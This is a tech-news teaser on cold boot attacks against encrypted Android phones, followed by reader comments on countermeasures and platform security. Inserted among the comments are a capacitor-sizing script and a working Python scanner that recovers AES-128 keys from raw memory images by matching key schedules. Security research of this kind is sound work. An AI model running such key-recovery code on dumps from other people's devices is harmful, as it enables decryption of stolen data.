Boffins FREEZE PHONES to crack Android on-device crypto

Computer scientists at the Friedrich-Alexander University of Erlangen-Nuremberg, Germany (FAU) have demonstrated that it is possible for unauthorized parties to recover data from encrypted Android smartphones using cold boot attacks. And when they say cold, they mean it – below 10°C, to be precise. Android has included built-in …

COMMENTS


Coat

cool!

*groan*

Unhappy

Damn!

Beat me to it.


ha

Icy what you did there.


Actually looking forward...

...to Eadons comment on this! ;D

Joke

Re: Actually looking forward...

"Close Windows so it doesn't get so cold" maybe?


"It's so cold in here I'm freezing my AES off"

Coat

Forgotten your pin?

Just chill.


Trollface

Does it only work with ICE-cream sandwich?

Facepalm

ICE cream is always better cold


if the phone is on and the encryption key in RAM

why the need to dick about?


Re: if the phone is on and the encryption key in RAM

Because the OS does not allow you to read that information from RAM, so they need to start another OS (the frosty one) that does allow it, without losing the information available in RAM.


Re: if the phone is on and the encryption key in RAM

... or the phone could be locked or ....


Re: if the phone is on and the encryption key in RAM

Well, probably because it all sounded so.... "kewlllll".

But, I thought this would be more like a "chill, peel", as in freezing the phone, and then peeling back the layers of an encryption chip or component. Interesting article... Umm, I meant "kewl" article...


capacitor-based overwrite

I've always wondered why devices don't include capacitors that can power them down sensibly in the few seconds after power failure. We were always warned about suddenly depowering HDDs, but I never understood why they couldn't contain a component holding enough charge to flush the cache and park the head. And in this case, a small capacitor on the mainboard, or in the RAM module, could zero the volatile memory in a few seconds.

FAIL

Re: capacitor-based overwrite

What size of capacitor do you think would be required?

Let's take a typical mobile phone.

Battery supplies 3.5V.

Phone draws (very roughly) 0.125A

If you want to keep the phone alive for 2 seconds to allow an orderly shutdown (which, for some phones, is WAY too short a time - try it!) then the size of capacitor you need is

Capacitor = (0.125 * 2) / 3.5

= 0.071F

(It's actually way more than that because after 2 seconds the capacitor would be empty, but let's go with this figure for now).

So, that's a 71mF capacitor (or a 71,000uF capacitor, given they are usually specified in uF or pF).

You might get away with 2 x 47,000uF capacitors in parallel.

And you want to fit that inside your mobile phone?

Good luck cramming those 2 capacitors, each 3cm in diameter and 5cm in length, into your tiny phone, John!

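The post's own parenthesis ("it's actually way more than that") is the part worth carrying through, so here is an added worked example, not anything from the post. Logic only runs down to some minimum rail voltage, and a phone draws roughly constant power rather than constant current as the rail sags, so the honest budget is energy: 0.5·C·(V0² − Vmin²) must cover P·t. The 3.0 V cut-off below is an assumption; the 3.5 V, 0.125 A and 2 s figures are the post's.

```python
"""
Sizing a hold-up capacitor for an orderly shutdown (or just RAM zeroisation).

Added worked example, not from the post. Compares two models:
  * the post's estimate C = I*t/V, which quietly assumes the capacitor can be
    drained all the way to 0 V while the phone keeps running; and
  * an energy budget that stops at the lowest voltage the logic still works at
    (V_MIN, assumed 3.0 V here): 0.5*C*(V0^2 - V_MIN^2) >= P*t.
"""


def hold_up_naive(i_amps, t_sec, v_volts):
    """Post's estimate: charge needed divided by the rail voltage."""
    return i_amps * t_sec / v_volts


def hold_up_energy(p_watts, t_sec, v0, v_min):
    """Capacitance whose usable energy between v0 and v_min covers p*t."""
    if not 0 <= v_min < v0:
        raise ValueError("v_min must be below the starting rail voltage")
    return 2.0 * p_watts * t_sec / (v0 ** 2 - v_min ** 2)


def sag_time(c_farads, p_watts, v0, v_min):
    """Inverse question: how long a given cap holds a constant-power load above v_min."""
    return 0.5 * c_farads * (v0 ** 2 - v_min ** 2) / p_watts


def compare(v0=3.5, i_amps=0.125, t_sec=2.0, v_min=3.0):
    """Carry the post's numbers through both models (v_min is an assumption)."""
    p = v0 * i_amps                      # load at nominal rail, in watts
    naive = hold_up_naive(i_amps, t_sec, v0)
    honest = hold_up_energy(p, t_sec, v0, v_min)
    return {
        "power_w": p,
        "naive_f": naive,                # post's 71 mF
        "energy_f": honest,              # what a 3.0 V brown-out limit really needs
        "ratio": honest / naive,         # 2*V0^2 / (V0^2 - Vmin^2), independent of I and t
        "naive_cap_holds_s": sag_time(naive, p, v0, v_min),
    }


if __name__ == "__main__":
    r = compare()
    for k, v in r.items():
        print(f"{k:>18}: {v:.4f}")
    # The post's suggested 2 x 47,000 uF bank, under the same 3.0 V limit:
    print(f"  2x47mF holds for: {sag_time(0.094, r['power_w'], 3.5, 3.0):.3f} s")
```

With a 3.0 V cut-off the energy model asks for about 0.54 F, roughly 7.5 times the post's 71 mF, and the 71 mF figure itself only holds the load up for about a quarter of a second. The ratio depends only on the two voltages, which is why a tighter brown-out margin makes the problem so much worse than the charge-per-volt estimate suggests.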
Anonymous Coward

Re: capacitor-based overwrite

Actually supercapacitors are pretty commonplace these days. You can get Farad range caps no problems. If you want to go to the extreme then look no further than KERS in F1 cars - they use capacitors to store electricity, and they get 80hp out of them.

I remember seeing a pocket radio that had a supercap instead of a battery. If they keep improving them then we may end up using supercaps instead of batteries in phones too.


Re: capacitor-based overwrite

Indeed. Take a look at RS's website:

http://uk.rs-online.com/web/p/electric-double-layer-capacitors/7116985/


Re: capacitor-based overwrite

All that is probably needed to stop that working is a little more sophistication than 'whipping the battery out and in as quick as possible'. Just holding the CPU in reset or even shorting the power rail to 0V as the supply is pulled will discharge the capacitor and stop the CPU from doing the zeroing of memory.

It adds an extra layer of protection that needs defeating but won't make a phone secure against attack. And if an attacker is after the information (rather than just fishing) they will probably be prepared to put that effort in. In fact there are almost certainly other ways to attack the phone and get a memory dump without having to freeze it so, while it's a novel attack vector, it's far from the only one.

Boffin

Re: capacitor-based overwrite

IIRC higher security devices like HSMs do have something like this implemented. It doesn't just activate on power-down, it will also be triggered if someone opens the box; that's why those devices have a higher FIPS 140-2 cert than regular mobile devices.

But then HSMs are 1U rack devices, not sure if that mechanism is small enough to fit inside a phone...

FAIL

Re: capacitor-based overwrite

And good luck fitting 2 or more of THOSE into your slim smartphone...


Small capacitors exist

Intel 320 SSDs include six 470µF capacitors to write the contents of RAM to flash (unwritten user data isn't stored in RAM, but the FTL maps are). They have pretty much the same size/volume as a mobile phone, so if they fit in the SSD they can fit in a phone.

However, you don't need to do that. Just have a really tiny built in battery alongside the main removable (well in most, but not all Android phones) battery. So that if the main battery drains or is removed there is still the tiny secondary battery to do whatever is necessary for a clean shutdown.

Best of all, always zero out the RAM first thing in the boot process. I assume Android probably does this, but the use of the "fast boot" probably skips that step. Don't skip that step and make your fast boot a little slower, and this attack will be thwarted.

Of course, anyone who has your phone in their possession can freeze it and disassemble it to remove the RAM chips and read them. Not exactly a "do at home" task, so while this wouldn't allow a jealous husband to read his wife's texts, it would allow a corporate spy to snag the competition's secrets.

Unless a phone is built to be tamper proof, which AFAIK no consumer phones are, the RAM removal attack will work for any OS - assuming you can figure out where in RAM the encryption key is kept. That will be easier on Android since you have source than it would be on closed source operating systems like iOS, WP8 or BB. But once you find it, it will presumably be simple to find again on other phones of the same make. ASLR may mean the high bits are different every time, but it will be in the same location on the page each time with the same stuff around it.

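The post above is right that the whole attack hinges on finding the key in the dump. Here is an added example of how that is normally done; it is not code from FROST or from the FAU researchers. The trick, from the 2008 cold boot work, is that 16 key bytes look like noise, but the 160-byte expanded key schedule that most AES implementations keep right after the key in memory is a deterministic function of those 16 bytes. So every 16-byte window is tried as a candidate key and accepted only if its expansion matches what follows it, optionally with a few bit errors to allow for decay. The sample image, the offset the schedule is planted at and the injected bit flips are constructed here; the key is the FIPS-197 test vector.

```python
"""
Locate AES-128 keys in a raw memory image by their key schedule.

Added example (not FROST, not the FAU code). A key alone is indistinguishable
from random bytes; its 176-byte expanded schedule is not, because the 160
bytes after the key are fixed by the key. Scan every window, expand the first
16 bytes, and keep the offsets whose expansion agrees with the bytes that
follow, within an optional bit-error budget to cope with remanence decay.
"""
import random


def _rotl8(x, s):
    return ((x << s) | (x >> (8 - s))) & 0xFF


def _build_sbox():
    """Generate the AES S-box (GF(2^8) inverse, then the affine map)."""
    sbox = [0] * 256
    p = q = 1                      # invariant: p * q == 1 in GF(2^8)
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF   # p *= 3
        q ^= q << 1                                            # q /= 3
        q ^= q << 2
        q ^= q << 4
        q &= 0xFF
        if q & 0x80:
            q ^= 0x09
        x = q ^ _rotl8(q, 1) ^ _rotl8(q, 2) ^ _rotl8(q, 3) ^ _rotl8(q, 4)
        sbox[p] = x ^ 0x63
        if p == 1:
            break
    sbox[0] = 0x63                 # 0 has no inverse; affine constant only
    return sbox


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
SCHEDULE_LEN = 176                 # 11 round keys * 16 bytes for AES-128


def _next_word(prev, first, rcon):
    """w[i] for i % 4 == 0: first ^ SubWord(RotWord(prev)) ^ rcon."""
    t = [SBOX[b] for b in prev[1:] + prev[:1]]
    t[0] ^= rcon
    return bytes(a ^ b for a, b in zip(first, t))


def expand_key_128(key):
    """FIPS-197 key expansion for a 16-byte key; returns the 176-byte schedule."""
    if len(key) != 16:
        raise ValueError("AES-128 key must be 16 bytes")
    w = [bytes(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        if i % 4 == 0:
            w.append(_next_word(w[i - 1], w[i - 4], RCON[i // 4 - 1]))
        else:
            w.append(bytes(a ^ b for a, b in zip(w[i - 4], w[i - 1])))
    return b"".join(w)


def find_aes128_keys(image, max_bit_errors=0):
    """Return [(offset, key)] for every window that is followed by its own schedule."""
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        window = image[off:off + SCHEDULE_LEN]
        cand = window[:16]
        # Cheap pre-filter for the exact case: the first expanded word alone
        # rejects nearly every offset before the full expansion is paid for.
        if max_bit_errors == 0 and _next_word(cand[12:16], cand[0:4], RCON[0]) != window[16:20]:
            continue
        diff = int.from_bytes(expand_key_128(cand), "big") ^ int.from_bytes(window, "big")
        if bin(diff).count("1") <= max_bit_errors:
            hits.append((off, cand))
    return hits


def flip_bits(data, bit_positions):
    """Simulate remanence decay by flipping the given absolute bit positions."""
    out = bytearray(data)
    for pos in bit_positions:
        out[pos // 8] ^= 1 << (pos % 8)
    return bytes(out)


def build_sample_image(seed=1, size=4096, offset=1200):
    """Constructed dump: seeded random filler with one schedule planted at `offset`."""
    rng = random.Random(seed)
    image = bytearray(rng.randrange(256) for _ in range(size))
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 test key
    image[offset:offset + SCHEDULE_LEN] = expand_key_128(key)
    return bytes(image), offset, key


if __name__ == "__main__":
    image, offset, key = build_sample_image()
    print("clean dump   :", [(o, k.hex()) for o, k in find_aes128_keys(image)])
    damaged = flip_bits(image, [(offset + 20) * 8 + 3, (offset + 100) * 8])
    print("2 bit errors :", find_aes128_keys(damaged))
    print("tolerant scan:", [(o, k.hex()) for o, k in find_aes128_keys(damaged, max_bit_errors=4)])
```

Two things this shows that the thread only hints at. First, the scan needs no knowledge of where the OS put the key, so ASLR and the "same place on the page" argument above are beside the point. Second, bit errors in the schedule are survivable with a tolerance, but errors in the 16 key bytes themselves are not with this simple check, which is why the published tools go further and reconstruct the key from a damaged schedule rather than trusting the first 16 bytes.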

Re: capacitor-based overwrite

Is there any utility capability in these batteries for Boeing? Sounds like Boeing could string a dozen or so of these along the lower bay and have them power all sorts of things... Maybe they could even be under a membrane on the skin of the fuselage so if they cause problems, just do a fly-by-wire yank and jettison the cap. Or, if it is not self-fueling, self-consuming, just kill the wire feeds.

Thumb Up

Re: capacitor-based overwrite

you are right... and this is how govt agencies survive... move your sight across other similar things not being improved.

Fake passports: there can be 101 ways to further improve but it will stop CIA and like to move around a little more difficultly.

Nikon D4s: nowhere to be seen yet cuz at 204,800 ISO .... U.S night vision companies will start to starve.


Re: capacitor-based overwrite

That would complicate the process, but there would be other ways to ensure abrupt powerdown and reset. Open case and short pins, perhaps. Or magnetic pulse - I've done that to a mobile before while using it to film a can-crusher I built.

Anonymous Coward

Re: capacitor-based overwrite

Or don't store the keys in the DRAM.

Sacrificing some register space (of which an ARM has plenty) would be one way to mitigate this sort of thing.


Re: capacitor-based overwrite

The zeroing of RAM wouldn't be the CPUs responsibility.

It should be lower level than that. Ideally it'd be on the RAM packaging itself, or directly on the memory bus.


Re: capacitor-based overwrite

Well the idea is not bad, if the capacitors would sit in RAM, it would be easy to manufacture RAM that on power-cut would zero its own memory contents. No need to power up the whole phone for that task.

And if you don't want to build that feature into the RAM chips, then make a small battery that can do it. However the zeroing of the RAM chips should not be an OS feature.

If you want to be completely secure you build this as a hardware feature onto the ram chips.

Anonymous Coward

Re: capacitor-based overwrite

You don't need enough power to run the device, only enough power to zero the RAM.

The case should have a tamper switch that would trigger it.

In software you could also define other triggers such as extreme temperature (and provide override functionality if desired).


Re: Small capacitors exist

Of course, anyone who has your phone in their possession can freeze it and disassemble it to remove the RAM chips and read them. Not exactly a "do at home" task, so while this wouldn't allow a jealous husband to read his wife's texts, it would allow a corporate spy to snag the competition's secrets.

I don't know - disassembling a phone could well be an at-home task for many folks. I've never tried taking apart a modern smartphone, but I've done plenty of workbench PCB mods on consumer devices in my day. Phones are smaller, with smaller feature sizes and surface-mount components and other complications, but I don't see why you couldn't have the necessary equipment at home. Nothing excessively expensive, bulky, power-consuming, sensitive, etc is required, as far as I can tell.

That said, though, changing the phone design so that the attack is difficult to mount without disassembly does increase the work factor significantly, and it removes the currently-plausible scenario of an undetected attack - where the attacker steals the phone, gains access, copies data and/or installs malware, and returns the phone with the victim none the wiser.

Anonymous Coward

"Why don't businesses use Android instead of Blackberry or iOS devices"......

Now you know why. That said, Blackberry devices are more secure than iOS, but BB10 is an unknown quantity.

Anonymous Coward

Are you for real?

Do you even vaguely know how badly broken ios and blackberry security is?

Boffin

Re: Are you for real?

iOS is broken, indeed.

But Blackberry (both OSen) actually have FIPS 140-2 certifications, something that none of the other OSen have achieved, not even Winbugs Phone 7/8.

FWIW I have never even seen BB jailbreaks being available...

Anonymous Coward

And this same attack vector

wouldn't work on Blackberry or iOS devices because...?

FAIL

Re: Are you for real?

Which goes to show how laughable FIPS is.

There's very little protection on BB from malicious apps. For instance apps can even inject keypresses. So, one bad app and "all your data are ours". The only reason that BB is used safely, is that they tend to be locked down by the company IT department.

-Mook

Boffin

Re: Are you for real? @Mookster

"There's very little protection on BB from malicious apps. For instance apps can even inject keypresses."

All those actions require the permissions to do so being granted by the user. You can actually block apps from doing such things by setting an explicit Deny on those ops, having a granular security model allows BB to do that.

iOS, as far as I remember, *doesn't* have that granular security, thus the iMob (?) apps were able to grab personal info and send it to the devs. Android might have those safeguards, being based on lookalike-Java; BB has that security model because of Java. I do wonder if they kept it for BB10, though...


Re: Are you for real?

Does anyone *want* a BB jailbreak?


Re: Are you for real?

Well less broken than android security.

That doesn't mean iOS or Blackberry would be secure.


Re: Are you for real?

FYI - Windows Phone 8 is designed to be FIPS 140-2 compliant and is currently undergoing certification.

Happy

Re: And this same attack vector

you ever tried taking out a battery on an iPhone, quickly or otherwise?

Thumb Down

Cold Boot Attack ?

So somebody repeated the cold boot attack from 5 years ago on a mobile phone?

http://www.engadget.com/2008/02/21/cold-boot-disk-encryption-attack-is-shockingly-effective/


Re: Cold Boot Attack ?

So somebody repeated the cold boot attack from 5 years ago on a mobile phone?

Yes. What's interesting here is:

- Demonstrating it on a mobile phone

- The fact that mobile phones are, er, mobile, which makes it easier to grab a phone and carry the attack out at your leisure (and makes it easier to fit in your freezer, for that matter)

- The FROST software, which goes a long way to automating the attack; this is nearly at script-kiddie level of simplicity

This is how security research works. When Matsui invented linear cryptanalysis and demonstrated it against DES, everyone didn't just say "oh, that's nice", and then forget about it. They tried attacking other block ciphers with LC. When Aleph One wrote "Smashing the stack for fun and profit", people went out and conducted a whole bunch of stack-smashing attacks to see what was vulnerable and refine the technique. Just because an idea's been published once doesn't mean there's no benefit in extending it to another target.


will be easy to neuter but not for existing phones

If future bootloader versions randomise RAM on startup this exploit vanishes. Won't help current devices though.

I've always said, if they get physical possession of the device assume your data can be read. This is just one way to do it without dismantling the phone. Does appear that drive encryption is still effective with the default locked bootloader. Unlock it and you should know the device is compromised, you unlock to hack them after all.


Re: will be easy to neuter but not for existing phones

Won't the memory map need to be in memory to access the randomized memory?


Re: will be easy to neuter but not for existing phones

The bootloader has write access to RAM and the mapping hardware or it couldn't load anything. Trivial to overwrite RAM from it.

Coat

Clearly this sheds a Muller light on your Android phone data.

I'll just get my heavily insulated coat for a trip to the freezer.


Firmware Flush

It's usually common practice to reset the device into a known state, forcing all registers to default values. Surprised they didn't flush the RAM with zeros in firmware when powered on.

Source: I work as an embedded engineer and design ASIC/FPGA switching fabrics


designed to extract encrypted data from RAM

Is the data encrypted in RAM as well as in flash or should that read "encryption data"?

Thumb Up

I remember seeing the effects of remanence on older graphics cards.

Booting Windows 98 you'd sometimes see a flash of your desktop before restart when the screen mode changed for the bootup screen.

FAIL

Only for rooted phones

Before you can load a custom recovery your phone has to be rooted. A lot of phones can't be rooted, others like HTC only let you root it once it's defaulted the phone.

So what % of phones have data worth getting & are rooted?

